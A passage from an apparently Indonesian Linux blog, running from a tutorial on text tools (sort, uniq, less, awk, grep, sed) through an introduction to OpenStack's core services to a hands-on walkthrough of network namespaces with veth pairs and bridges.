kilo
zebra

Jadi, sort mengurutkan dari 0-9 kemudian a-z. Kalau mau sebaliknya, pakai argumen -r (reverse).

Sort mode reverse dari stdin

$ cat data.txt | sort -r
zebra
kilo
charlie
bravo
456
123

uniq

uniq ini dipakai buat print file atau stdin ke stdout tapi skip baris yang sama dan berdekatan.

uniq [OPTION]... [INPUT [OUTPUT]]

Coba dengan file data.txt

$ cat > data.txt << EOF
> satu
> satu
> dua
> dua
> tiga
> tiga
> EOF

Kalau kita print file itu pakai uniq,

$ uniq data.txt
satu
dua
tiga

Jadi kalau ada line atau baris berdekatan yang sama, uniq print satu saja. Tapi bagaimana kalau misalnya baris yang sama itu tidak berdekatan?

$ cat > data.txt << EOF
> satu
> tiga
> dua
> tiga
> satu
> dua
> EOF

Isi file yang seperti itu, kalau kita pakai uniq

$ uniq data.txt
satu
tiga
dua
tiga
satu
dua

Tidak ada yang berubah.

Triknya, kalau kita mau print baris pakai uniq tapi line-nya tidak berdekatan, kita bisa pakai sort.
Misalnya

$ cat data.txt | sort | uniq
dua
satu
tiga

Kita print dulu data.txt, kemudian di sorting pakai command sort, baru pakai uniq.

Itu program-program Coreutils untuk manipulasi output. Selanjutnya kita ke program-program selain Coreutils.

more & less

Command more dan less fungsinya sama. Kalau kita print file yang isinya banyak baris dan tidak fit di layar, more dan less bisa dipakai buat scroll.
Jadi sama seperti kalau kita baca artikel di web yang panjang, kita bisa scroll halamannya kebawah.

Program more sebenarnya termasuk Coreutils, kalau less bukan. Kelemahan program more, dia tidak bisa scroll ke atas, cuma scroll ke bawah. Nah para hacker yang kurang suka limitasi ini buat program sendiri seperti more tapi yang bisa scroll ke atas, lucunya program itu malah dinamakan less.

Contoh penggunaan less misalnya kalau kita baca file syslog yang panjang itu.

less /var/log/syslog

Tekan <Enter> atau panah ke bawah untuk scroll ke bawah, panah atas untuk scroll ke atas. Program less dan more juga bisa baca dari stdin selain dari file.

cat /var/log/syslog | less

Sama saja.

Tiga program selanjutnya, awk, grep, dan sed perlu Regular Expression yang sudah ditulis di atas. Di contoh ini saya tidak akan pakai karakter regex yang aneh-aneh, yang simpel saja.

awk

Sama seperti program-program yang lain, awk ini juga dipakai buat manipulasi stream. Bedanya, awk ini lebih programmable atau seperti scripting. Input awk bisa dari file atau stdin.

Secara umum penggunaan awk seperti ini

awk '/pattern_regex/ {action1;}' file

Salah satu dari /pattern_regex/ atau {action;} boleh tidak dipakai, tapi tidak dua-duanya. Kalau {action;} tidak ada, maka action dianggap {print}. {print} ini action default di awk.

Proses awk kalau dirinci seperti ini:

awk baca input dari file atau stdin baris per baris.
Kalau ada /pattern_regex/, di setiap baris teks, periksa pattern regex. Kalau match eksekusi action yang ada di kurung kurawal. Kalau tidak, baris teks dilompati dan action tidak dieksekusi.
Kalau tidak ada /pattern_regex/, eksekusi {action;} di setiap baris teks.
Kalau tidak ada {action;} print baris teks yang match dengan /pattern_regex/.

Contoh umum penggunaan awk sama seperti cut.
Masih ingat program cut di atas?

Sama seperti cut, awk juga ada delimiter dan default delimiter di program awk ini bisa spasi atau tab. Sama seperti cut juga, delimiter bisa disesuaikan.

Langsung saja dengan contoh file data.txt

$ cat > data.txt << EOF
> satu dua tiga empat
> EOF

Sama seperti cut, kalau kita mau print field 3 pakai awk, caranya:

$ awk '{print $3;}' data.txt
tiga

Untuk field 1 dan 3

$ awk '{print $1,$3;}' data.txt
satu tiga

Sekarang kita coba dengan data.txt yang berisi dua baris.

$ cat > data.txt << EOF
> satu dua tiga empat
> lima enam tujuh delapan
> EOF

Coba print field ke 3.

$ awk '{print $3;}' data.txt
tiga
tujuh

Kalau misalnya kita mau awk eksekusi action di baris tertentu saja, kita bisa filter baris itu. Misalnya untuk eksekusi action print di baris yang diawali lima saja.

$ awk '/^lima.*/ {print $3;}' data.txt
tujuh

Line yang pertama di-skip karena tidak ada pattern lima.

Seperti yang lain, awk juga bisa baca dari stdin.

$ cat data.txt | awk '/^lima.*/ {print $3;}'

Bagaimana untuk delimiter yang bukan spasi atau tab?
Ambil contoh seperti file /etc/passwd yang seperti ini:

root:x:0:0:root:/root:/bin/bash

Kita bisa pakai argumen -F diikuti karakter delimiternya.

$ awk -F: '/^root/ {print $7;}' /etc/passwd
/bin/bash

grep

grep dipakai buat filter baris teks yang ada berisi pattern Regular Expression yang dicari.

grep [OPTIONS] PATTERN [FILE...]

Misalnya file data.txt isinya dua baris seperti di bawah:

$ cat > data.txt << EOF
> satu dua tiga empat
> lima enam tujuh delapan
> EOF

Nah pakai grep, kita bisa filter baris teks yang ada pattern "enam" misalnya.

$ grep "enam" data.txt
lima enam tujuh delapan

grep ini case sensitive, jadi ABCD beda sama abcd. Kalau mau pakai pattern yang case insensitive atau besar kecil huruf bukan masalah, pakai argumen -i.

$ grep -i "ENAM" data.txt
lima enam tujuh delapan

Kadang kita perlu tahu di baris ke berapa pattern regex itu match. Terutama teks yang isinya ratusan atau ribuan baris seperti source code.

kita bisa instruksikan grep supaya print nomor baris itu, caranya pakai argumen -n.

$ grep -ni "ENAM" data.txt
2:lima enam tujuh delapan

2, itu nomor barisnya.

Selain file, grep juga bisa terima input dari stdin.

$ cat data.txt | grep "enam"

Untuk pattern yang lebih kompleks misalnya.

$ cat data.txt | grep "^s.*t$"
satu dua tiga empat

Maksudnya "^s.*t$" baris yang dimulai huruf s (^s), diikuti karakter apa saja dengan jumlah berapa saja (.*) dan diakhiri huruf t (t$).

sed

sed ini stream editor, program yang powerful dan keren sekali di Linux. Pakai sed ini kita bisa edit file teks tanpa perlu buka file itu di editor seperti Vim atau Emacs.

Anda juga bisa bayangkan sed ini seperti pipe, terima input dari ujung yang satu dan keluar dari ujung yang lain. Bedanya, sed ada proses manipulasi stream, jadi outputnya beda sama input karena sudah dimanipulasi.

Proses sed kurang lebih seperti di bawah:

Terima input dari file atau stdin, baca baris per baris.
Di setiap baris, tempatkan baris teks itu di buffer.
Edit teks yang ada di buffer.
Print teks yang sudah diedit ke output.
Lanjut ke baris berikutnya, eksekusi nomor 1 sampai 4 sampai tidak ada lagi input atau eof (end of file).

sed ini punya banyak mode untuk manipulasi stream. Di sini kita pelajari tiga saja yang umum dipakai.

print. Print baris teks tanpa ada modifikasi teks.
delete. Delete baris teks.
subtitute. Cari pola karakter berdasarkan regex dan subtitusi karakter itu dengan karakter lain.

Print
Mode print dipakai buat print baris teks tanpa ada manipulasi teks.

Contoh dengan file data.txt yang seperti ini.

$ cat data.txt
1. satu
2. dua
3. tiga
4. empat
5. lima
6. enam
7. tujuh
8. delapan
9. sembilan
10. sepuluh

Format mode print: sed -n '<nomor baris>'p file.

Contoh print baris ke 7.

$ sed -n '7'p data.txt
7. tujuh

Print baris terakhir pakai tanda $ (dolar).

$ sed -n '$'p data.txt
10. sepuluh

Print baris ke dua sampai 5.

$ sed -n '2,5'p data.txt
2. dua
3. tiga
4. empat
5. lima

Print baris ke delapan sampai baris terakhir.

$ sed -n '8,$'p data.txt
8. delapan
9. sembilan
10. sepuluh

Delete
Format untuk mode delete: sed '<nomor baris>'d file.

Mode delete ini bisa dianggap kebalikan dari mode print.

Contoh delete baris ke 7.

$ sed '7'd data.txt
1. satu
2. dua
3. tiga
4. empat
5. lima
6. enam
8. delapan
9. sembilan
10. sepuluh

Delete baris terakhir pakai tanda $ (dolar).

$ sed '$'d data.txt
1. satu
2. dua
3. tiga
4. empat
5. lima
6. enam
7. tujuh
8. delapan
9. sembilan

Delete baris ke dua sampai 5.

$ sed '2,5'd data.txt
1. satu
6. enam
7. tujuh
8. delapan
9. sembilan
10. sepuluh

Delete baris ke delapan sampai baris terakhir.

$ sed -n '8,$'d data.txt
1. satu
2. dua
3. tiga
4. empat
5. lima
6. enam
7. tujuh

Subtitusi
Mode subtitusi ini bisa dibilang search and replace, cari karakter pakai regex, kalau ketemu replace.

Saya suka pakai sed mode ini, lebih cepat daripada harus lewat teks editor.

Format mode subtitusi: sed 's/regex/replace/' file

Dengan contoh file data.txt seperti di bawah,

$ cat > data.txt << EOF
> 123 abc
> EOF

Coba subtitusi karakter 123 dengan 456.

$ sed 's/123/456/' data.txt
456 abc

sed ini kalau kita instruksikan buat subtitusi karakter, cuma pattern yang pertama match saja yang dirubah.

$ cat > data.txt << EOF
> 123 abc 123
> EOF
$
$ sed 's/123/456/' data.txt
456 abc 123

Pattern 123 yang kedua tidak berubah. Kalau kita mau rubah semuanya, pakai g (global) setelah delimiter terakhir.

$ sed 's/123/456/g' data.txt
456 abc 456

Tentu saja sed ini juga bisa ambil input dari stdin selain file.

$ cat data.txt | sed 's/123/456/g'
456 abc 456

Dari semua contoh di atas itu, output semuanya di print ke stdout. Kadang kita perlu juga output bukan stdout tapi langsung ke file.
sed punya satu fitur untuk ini namanya in-place. Pakai in-place, input dan output adalah file yang sama. Gampangnya, edit file tanpa perlu buka di editor.

$ cat > data.txt << EOF
> 123 abc 123
> EOF

Merubah file secara in-place pakai argumen -i.

$ sed -i 's/123/456/' data.txt
$ cat data.txt
456 abc 123

Sampai sini topik kali ini, manipulasi teks dan stream.
Contoh-contoh yang ditulis di atas itu sedikit, cuma buat pengenalan. Kalau kurang, “Man page is your friend”, dan tentu saja Google.

Saya terbuka, jadi silahkan disampaikan kalau di tulisan ini ada yang perlu dikoreksi, perlu ditambah atau dikurangi, asal bukan untuk dihapus.

Sampai jumpa di tulisan selanjutnya, Insya Allah.

Membumikan OpenStack

2016-05-14T00:13:00+08:00

Hari itu tanggal 13 Februari 2016, bunyi notifikasi di hape tanda ada email masuk. Subject email itu bunyinya “Debian 6.0 Long Term Support reaching end-of-life”, email announcement dari tim Debian.

Semua Linux admin paham apa maksudnya ini. Ya, itu berarti upgrade sistem, sebuah task yang njlimet.

Tapi tetap saja, sistem harus diupgrade. Debian 6 dengan nama Squeeze itu sudah lima tahun dari lahirnya di tahun 2011 lalu.

Februari 2016, Debian stable yang paling baru namanya Debian Jessie, versi 8.
Itu artinya, prosesnya pasti semakin rumit karena proses upgrade tidak bisa lompat dari 6 langsung ke 8, harus upgrade ke versi 7 dulu atau Debian Wheezy.

Dengan pertimbangan proses yang njlimet itu, juga karena lingkungan virtualisasi Xen, ditambah lagi karena banyaknya jumlah server yang harus diupgrade, saya putuskan tidak upgrade.

Sistem tidak diupgrade, tapi saya lebih milih buat fresh install Debian Jessie.

Nyatanya pilihan ini juga tidak lebih mudah, saya harus pikirkan juga bagaimana caranya migrasi sistem dengan waktu downtime yang minim.

Strategi yang muncul di pikiran saya waktu itu, pakai satu mesin untuk host virtualisasi, terus buat guest OS Debian 8 di situ, kemudian migrasi konfigurasi.

Nah di sinilah perkenalan saya dengan OpenStack dimulai.

Saya tidak tinggal di goa, jadi kata seperti cloud computing, big data, dan OpenStack sering sekali saya dengar. Kata-kata itu biasanya cuma lewat begitu saja, tapi karena momen upgrade ini Saya jadi punya niat buat memahami apa itu OpenStack.

Saya buka Google, cari tentang OpenStack berbahasa Indonesia belum ada yang bisa memuaskan keingintahuan Saya. Kebanyakan tulisan terlalu advance, banyak juga yang pengenalan OpenStack tapi tidak terlalu ramah buat yang belum ngerti OpenStack seperti saya waktu itu.

Dari hasil baca sana-sini saya masih juga kesulitan memahami konsep OpenStack. Tapi akhirnya biarpun berbekal sedikit pengetahuan, Saya tetap install OpenStack. Setup OpenStack Saya waktu itu, satu controller dan dua compute node biar bisa redundant maksudnya.

Setelah proses deploy dan testing yang sangat singkat itu, hasilnya saya berani putuskan bahwa setup OpenStack ini siap beroperasi.

Dan sekarang saya pikir, Saya juga perlu menulis pengenalan OpenStack berdasarkan pemahaman Saya.

Tentang OpenStack

Saya yakin banyak pengguna ~~Linux~~ GNU/Linux, mungkin juga Anda salah satunya yang sering dengar kata OpenStack, atau mau belajar OpenStack tapi masih geleng-geleng belum ngeh apa itu OpenStack.

Kabar baiknya, di artikel ini saya mau coba kasih gambaran tentang pengertian OpenStack termasuk komponennya. Kabar buruknya, karena Saya juga termasuk baru kenal OpenStack, jadi tidak semua hal tentang OpenStack ada di tulisan ini.

Kalau kita bahas tentang OpenStack pasti tidak bisa lepas dari yang namanya buzzword “Cloud”. Ya, jadi kata Cloud itu cuma buzzword. Artinya, Cloud itu bukan terminologi teknis, jadi arti kata Cloud itu bisa beda masing-masing orang.

Tapi coba kita lihat definisi Cloud Computing yang lumayan bikin bingung dari Wikipedia ini:

“Cloud computing, also on-demand computing, is a kind of Internet-based computing that provides shared processing resources and data to computers and other devices on demand. It is a model for enabling ubiquitous, on-demand access to a shared pool of configurable computing resources (e.g., networks, servers, storage, applications and services)“

Jadi, secara umum yang mereka-mereka maksud dengan Cloud Computing itu, layanan komputasi yang resource komputasinya seperti jaringan, hard disk, dan server, itu tidak perlu dikelola sendiri dan resource itu sifatnya on-demand.

Seperti Saya, atau Anda juga yang punya email Gmail misalnya. Kita tidak perlu punya server, tidak perlu sewa jaringan sama public ip address kalau mau bisa pakai email. Cukup buka browser, atau pakai smartphone sudah bisa baca sama kirim email.
Resourcenya seperti server, storage, sama jaringannya kita tidak perlu ikut mikir, biarkan itu Google saja yang mikir.
Sama seperti kalau kita perlu listrik, kita tidak perlu punya pltd sendiri kan? kita tinggal sewa saja dari PLN, beres.

Nah, dengan pemahaman Cloud yang seperti itu, terus di mana tempat dan fungsinya OpenStack?

Jadi OpenStack adalah software suite, atau kumpulan banyak software yang fungsinya untuk mengatur resource komputasi itu. OpenStack fungsinya mengatur server, hard disk, network, dan sebagainya. Karena itu OpenStack menyebut dirinya sebagai Cloud Software.

Sebenarnya OpenStack itu adalah project Open Source yang lahirnya belakangan. Jadi sebelum OpenStack sudah ada project yang kurang lebih sama, seperti OpenNebula contohnya.

OpenStack disebut software suite karena memang ada lebih dari satu software cloud di OpenStack itu. Beda sama software cloud yang spesifik, software cloud buat storage misalnya seperti ownCloud atau Seafile.
Kalau untuk storage-nya, OpenStack punya software yang namanya Swift sama Cinder.

Masing-masing software atau service di OpenStack ini bisa jalan sendiri-sendiri atau independen. Jadi kalau misalnya kita cuma perlu software cloud buat storage, kita bisa install OpenStack Swift saja, yang lain tidak perlu.

Sudah paham kalau OpenStack adalah software suite untuk cloud? Sekarang coba kita lihat apa saja software atau service di OpenStack.

OpenStack punya nama-nama untuk masing-masing software nya.

Keystone: Identity service
Nova: Compute service
Glance: Image service
Swift: Object storage service
Cinder: Block storage service
Neutron: Networking service

Enam software di atas itu yang termasuk inti atau core service di OpenStack, cuma enam ini juga yang mau saya tuliskan.

Saya tidak bahas service yang lain karena saya juga tidak pernah pakai service itu kecuali Horizon. Horizon ini buat manajemen Cloud lewat interface web.

Service selain enam core di atas:

Horizon: Dashboard Web management
Trove: Database
Zaqar: Messaging
Barbican: Key Management
Congress: Governance
Ceilometer: Telemetry
Sahara: Elastic Map Reduce
Manila: Shared Filesystems
Magnum: Containers
Heat: Orchestration
Ironic: Bare-Metal Provisioning
Designate: Domain Name Service
Murano: Application Catalog

Keystone

Keystone adalah identity service. Mungkin service Keystone ini yang wajib ada di tiap-tiap instalasi OpenStack. Jadi semua service sama tenant di OpenStack harus terdaftar di Keystone ini.

Misalnya kita nambah service baru, seperti Nova contohnya, Nova ini harus di daftarkan di Keystone. User sama tenant begitu juga, harus terdaftar di Keystone.

Istilah Tenant di OpenStack itu seperti grup resource. Jadi setiap tenant itu punya user sama kapasitas resource-nya masing-masing. Kita bisa batasi resource storage buat tenant A maksimal 100 GB misalnya.

Itu Keystone. Jadi Keystone itu service OpenStack yang berhubungan dengan Tenant, User, sama service yang lain.

Nova

Nova adalah compute service, atau virtualisasi, atau service virtual machine. Nova tugasnya membuat guest OS atau virtual machine, restart, shutdown, destroy guest OS, itu semuanya dari Nova.

Nova ini frontend, artinya Nova bukan teknologi hypervisor seperti KVM, Xen dan teman-temannya. Untuk hypervisor-nya Nova bisa pakai backend Qemu, bisa juga pakai KVM, Xen, bahkan VMware vSphere.

Itu Nova. Jadi jelas ya, bahwa fungsi Nova ini lebih ke Virtual Machine.

Glance

Glance fungsinya buat manage disk image. Disk image ini yang nantinya diattach ke vm lewat Nova, terus dipakai buat hard disk virtual.
Glance ini seperti repositori disk image, user bisa upload disk image, terus instruksikan Nova supaya boot pakai disk image ini.

Jadi gambarannya kurang lebih seperti itu. Glance itu fungsinya berhubungan dengan image, disk image.

Swift

Swift adalah service object storage di OpenStack.

Sudah pernah dengar object storage? ini salah satu dari beberapa jenis storage, yang lain misalnya seperti file-level storage sama block-level storage.

Di object storage, kalau misalnya kita simpan file di storage dengan tipe ini, data yang disimpan di storage ini disebut object.

Object ini masing-masing punya metadata, metadata ini berisi informasi tentang object, misalnya tipe filenya, besarnya berapa, dibuat kapan, dan sebagainya. Terus setiap object ini juga punya id masing-masing yang unik.

Kita ambil contoh, kita sudah tidak asing sama layanan cloud storage semacam Google Drive atau Amazon S3.
Bisa kita bayangkan dari semua pengguna Google Drive itu, kalau dihitung semua kapasitas storage-nya pasti bukan hitungan terabyte lagi, anggap saja sekian exabyte atau jutaan terabyte.

Nah, problemnya adalah, bagaimana mengatur data sebesar itu? itu pasti jadi persoalan sendiri.

Di sinilah keunggulan storage tipe object storage. Kapasitas storage dengan tipe ini bisa scaling atau bisa membesar kapasitasnya sampai skala unlimited. Terus kerennya lagi, letak geografis bukan masalah buat object storage.

Jadi storage yang terpisah-pisah secara geografis, data center yang beda lokasi bukan masalah karena object storage melihatnya sebagai satu entity.

Karena itu, karena kelebihan ini makanya layanan seperti Amazon S3 sama Google Drive pakai object storage buat nyimpan data.

Cinder

OpenStack Cinder adalah service block storage. Block storage ini beda sama Swift yang object storage di atas.
Block storage ini nyimpan data di disk dalam bentuk block, block ini biasanya disebut volume.

Block storage itu kebanyakan dipakai di Storage Area Network atau SAN. Data yang bentuknya block itu bisa dipakai buat hard disk virtual, karena itu tipe storage ini banyak dipakai buat filesystem di Guest OS.

Block yang tersimpan di disk itu bisa didistribusikan sebagai hard disk virtual ke server-server lewat protokol iSCSI atau Fibre Channel (FC), ini bukan typo tapi memang betul fibre bukan fiber.
Fibre Channel ini protokol, kalau fiber optic itu medianya.

Terus OS yang pakai FC atau iSCSI ini nantinya bisa memperlakukan block yang dari SAN itu, sama seperti hard disk fisik. Block ini bisa diformat ke filesystem tertentu seperti ext4, ntfs, atau fat dan diisi data.

Tipe storage yang ini lebih cepat kalau dibanding object storage, itu kelebihannya, karena itu tipe block ini lebih cocok buat database sama filesystem untuk OS.
Kelemahannya, tipe block ini kurang bisa scaling seperti object storage. Jadi kalau object storage bisa scaling bahkan sampai beda lokasi, block storage tidak.

Neutron

OpenStack Neutron ini adalah layanan Networking as a Service atau NaaS. saya sendiri juga belum ngeh konsep NaaS ini sampai Saya pakai OpenStack, padahal Saya punya background jaringan.

Neutron ini tugasnya me-manage jaringan virtual, alokasikan ip address, termasuk juga security firewall.
Pakai Neutron ini, user tenant bisa buat jaringan virtual untuk tenant-nya, dia juga bisa buat router virtual termasuk port-nya, atur firewall, ip address, dan lainnya.

Dari semua service core di OpenStack, menurut saya Neutron ini yang paling susah, paling susah dimengerti. Karena ketika dipelajari lagi ternyata Neutron ini banyak komponen program Linux yang membentuk jadi Neutron. Dari Linux bridge, Open vSwitch, OpenFlow, Linux virtual ethernet, sampai Linux network namespace.

Kalau Anda mau pelajari OpenStack Neutron lebih dalam lagi, silahkan baca tulisan saya yang lain tentang Neutron, Memahami OpenStack Neutron lebih dalam sama lanjutannya juga, Cara Kerja OpenStack Networking - Memahami Network Namespace.

Dua artikel ini saya rasa cukup buat memahami gambaran bagaimana OpenStack Neutron itu sebenarnya.

Manajemen OpenStack

Untuk manajemen service-nya, OpenStack punya tiga fasilitas. Dashboard web GUI lewat service Horizon, bisa juga pakai Command Line Interface atau CLI, atau Application Programming Interface atau API.

Dua yang awal tidak perlu banyak penjelasan, tinggal yang terakhir API. API ini interface buat pemrograman, pakai API ini developer atau programmer bisa buat program sendiri buat me-manage service OpenStack.
Terus program itu berkomunikasi dengan OpenStack lewat API ini. Jadi API ini semacam perantara antara program yang dibuat programmer sama OpenStack.

Conclusion

Kalau Anda pengguna Linux yang bukan end user atau sekedar pengguna, atau Anda berada di industri IT, terutama Linux, menurut saya OpenStack layak untuk dipelajari. Kita lihat saja tren komputasi sekarang, data yang besar, masif, dan terpusat.

Kalau dulu developer jualan software, sekarang software ditaruh di cloud terus dibuat layanan atau istilah kerennya sekarang Software as a Service (SaaS), Google Apps contohnya.

Google Apps ambil contoh saja seperti aplikasi perkantoran Google Docs. Kalau seperti Microsoft Office programnya dijual, tapi kalau Google Docs programnya tidak dijual tapi ditempatkan di cloud terus dijadikan layanan.
User tinggal buka browser, kapan saja dari mana saja dan dari perangkat apa saja bisa pakai service program Google Docs.

Kalau misalnya perlu update software, atau ada problem sama programnya, itu juga bukan tanggung jawab user tapi Google.

Nah OpenStack bisa menjawab tren computing itu, OpenStack ini juga sebuah project Open Source yang besar karena sebagian besar leader di industri IT berkontribusi di OpenStack. Sebut saja seperti Rackspace, Red Hat, Ubuntu, Google, Intel, Cisco, dan masih banyak lagi yang terlibat di project ini.

Saya sendiri begitu sudah sedikit ngeh dengan OpenStack ini, saya merasa kagum sama sistem ini, dan seharusnya Anda juga.

Terakhir, saya minta bantuan Anda untuk share tulisan ini kalau menurut Anda tulisan ini bisa membantu buat pemula OpenStack.

Terima kasih.

Artikel Berkaitan:
Convert Database OpenStack Cinder dari Sqlite3 ke MySQL - Debian Jessie
Kesalahan konfigurasi default OpenStack Cinder di Debian 8, dan bagaimana cara konversi database dari Sqlite3 ke MySQL

Cara Kerja OpenStack Networking - Memahami Network Namespace

2016-05-09T20:02:00+08:00

Melanjutkan tentang OpenStack Networking di tulisan yang lalu dengan judul Memahami OpenStack Neutron lebih dalam, ada salah satu fitur Linux yang dipakai OpenStack Networking dan belum dibahas, fitur Linux itu namanya network namespace.

Mungkin di antara Anda para pembaca ada yang punya background networking. Di dunia networking ada istilah yang dikenal dengan VRF (Virtual Routing and Forwarding). VRF ini memungkinkan lebih dari satu routing table coexist dalam satu router fisik, artinya dalam satu router ada banyak router virtual dengan routing table yang independen dan terpisah dari yang lain. Nah di Linux, fitur ini dinamakan network namespace.

Masing-masing network namespace di Linux punya routing table sendiri-sendiri, interface sendiri-sendiri dan juga firewall yang terpisah. Fitur ini yang dipakai OpenStack untuk membuat virtual network dan virtual router.

Seperti router dan network pada umumnya, di network namespace juga ada interface, routing table, firewall, dan ip address. Bedanya, di network namespace kita tidak bisa pakai interface fisik, kita cuma bisa pakai interface virtual. Jadi tidak ada eth0 atau eth1 atau wlan0 di network namespace.

Karena tidak bisa pakai interface fisik, maka network virtual ini secara default juga tidak bisa berkomunikasi dengan jaringan fisik, seperti Internet misalnya. Dan untuk mengatasi batasan itu, biasanya digunakan bridge untuk menjembatani antara jaringan fisik dan jaringan virtual.
OpenStack Neutron atau networking juga menggunakan bridge Open vSwitch untuk menjembatani dua jaringan ini.

Command-command namespace

Di contoh ini saya pakai banyak command ip. Kalau Anda masih sering pakai command ifconfig dan command route, saran Saya segera saja tinggalkan karena dua command itu dari zaman batu. Gantinya, pelajari command ip dari package iproute2 karena yang ini lebih modern.

Karena network namespace sama seperti network biasa, maka command ip juga bisa dipakai di namespace.

Menambahkan network namespace:

ip netns add test-netns

Command ini untuk membuat network namespace baru dengan nama test-netns.

Untuk melihat semua netns

root@DEATH-STAR:~# ip netns show
test-netns
root@DEATH-STAR:~#

Untuk mengeksekusi command dalam netns, pakai ip netns exec <nama netns> <command>. Contoh untuk eksekusi command ip link show di netns test-netns

root@DEATH-STAR:~# ip netns exec test-netns ip link show
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN mode DEFAULT group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
root@DEATH-STAR:~#

Kalau command di atas dibagi jadi tiga bagian, maka seperti ini:

ip netns exec : Ini dipakai untuk eksekusi command dalam network namespace.
test-netns : test-netns adalah nama network namespace.
ip link show : Ini command yang dieksekusi di dalam netns.

Seperti terlihat di output, waktu kita buat namespace atau netns baru, di netns baru itu langsung ada interface loopback (lo) tapi dengan status down, jadi tidak bisa kita ping.

root@DEATH-STAR:~# ip netns exec test-netns ping localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
^C
--- localhost ping statistics ---
4 packets transmitted, 0 received, 100% packet loss, time 3024ms

Kita harus up-kan dulu interface loopback lo baru kemudian loopback tersebut bisa berfungsi.
Supaya interface lo bisa up, pakai command ip link set lo up. Di dalam netns tentu saja.

root@DEATH-STAR:~# ip netns exec test-netns ip link set lo up
root@DEATH-STAR:~# ip netns exec test-netns ping localhost
PING localhost (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost (127.0.0.1): icmp_req=1 ttl=64 time=0.126 ms
64 bytes from localhost (127.0.0.1): icmp_req=2 ttl=64 time=0.066 ms
64 bytes from localhost (127.0.0.1): icmp_req=3 ttl=64 time=0.057 ms
^C
--- localhost ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1998ms
rtt min/avg/max/mdev = 0.057/0.083/0.126/0.030 m

Netns ini belum bisa berkomunikasi dengan dunia luar. Supaya bisa maka harus kita buat bridge untuk menjembatani itu.

Di Debian yang saya pakai untuk percobaan ini nama interface-nya eth0. Kemudian Saya akan coba buat sepasang Linux Veth, salah satu veth di assign ke netns test-netns, satunya lagi dijadikan member bridge br0 bersama eth0. eth0 ini tersambung dengan kabel ke jaringan fisik external termasuk jaringan Internet.

Buat bridge br0 dengan member eth0, request ip address ke server DHCP dan test ping ke Google dns.

root@DEATH-STAR:~# brctl addbr br0
root@DEATH-STAR:~# brctl addif br0 eth0
root@DEATH-STAR:~# brctl show br0
bridge name bridge id               STP enabled     interfaces
br0         8000.80c16e592e43       no              eth0
root@DEATH-STAR:~#
root@DEATH-STAR:~# dhclient br0
Restarting ntp (via systemctl): ntp.service.
root@DEATH-STAR:~# ip addr show br0
4: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 80:c1:6e:59:2e:43 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.10/27 brd 10.10.10.31 scope global br0
            valid_lft forever preferred_lft forever
root@DEATH-STAR:~#
root@DEATH-STAR:~# ping 8.8.8.8
PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.
64 bytes from 8.8.8.8: icmp_req=1 ttl=55 time=47.2 ms
64 bytes from 8.8.8.8: icmp_req=2 ttl=55 time=48.5 ms
64 bytes from 8.8.8.8: icmp_req=3 ttl=55 time=44.0 ms
^C
--- 8.8.8.8 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 44.051/46.605/48.540/1.900 ms
root@DEATH-STAR:~#

Selanjutnya buat sepasang Linux Veth dengan nama veth1 dan veth2

root@DEATH-STAR:~# ip link add veth1 type veth peer name veth2
root@DEATH-STAR:~#
root@DEATH-STAR:~# ip link show | grep veth
5: veth2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
6: veth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
root@DEATH-STAR:~#

Seperti yang sudah dijelaskan di artikel sebelumnya, Linux Virtual Ethernet (Veth) adalah sepasang interface yang kalau ada paket masuk lewat salah satu interface maka paket itu akan keluar lewat interface lainnya.

Berikutnya, assign interface veth1 ke namespace test-netns dan veth2 ke bridge br0.

root@DEATH-STAR:~# brctl addif br0 veth2
root@DEATH-STAR:~# brctl show br0
bridge name bridge id               STP enabled     interfaces
br0         8000.80c16e592e43       no              eth0
                                                    veth2
root@DEATH-STAR:~# ip link set veth1 netns test-netns

Kalau kita cek lagi dengan ip link show, veth1 sudah hilang karena sudah ada di namespace test-netns

root@DEATH-STAR:~# ip link show | grep veth
5: veth2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000

Cek ip link show di test-netns

root@DEATH-STAR:~# ip netns exec test-netns ip link show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
6: veth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000
    link/ether 26:e1:4d:ee:33:ef brd ff:ff:ff:ff:ff:ff
root@DEATH-STAR:~#

Perlu juga diperhatikan bahwa nomor index interface tidak berubah biarpun interface ada di netns. Di namespace test-netns nomor interface 1 untuk lo dan 6 untuk veth1 karena nomor index interface veth1 adalah 6.

Coba dihidupkan interface veth1 dan veth2 kemudian request ip address ke DHCP server di test-netns dan coba ping ke Google.

root@DEATH-STAR:~# ip link set veth2 up
root@DEATH-STAR:~#
root@DEATH-STAR:~# ip netns exec test-netns ip link set veth1 up
root@DEATH-STAR:~# ip netns exec test-netns dhclient veth1 >/dev/null
root@DEATH-STAR:~#
root@DEATH-STAR:~#
root@DEATH-STAR:~# ip netns exec test-netns ip addr show
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
        valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
        valid_lft forever preferred_lft forever
6: veth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 26:e1:4d:ee:33:ef brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.25/27 brd 10.10.10.31 scope global veth1
        valid_lft forever preferred_lft forever
    inet6 fe80::24e1:4dff:feee:33ef/64 scope link 
        valid_lft forever preferred_lft forever

root@DEATH-STAR:~#
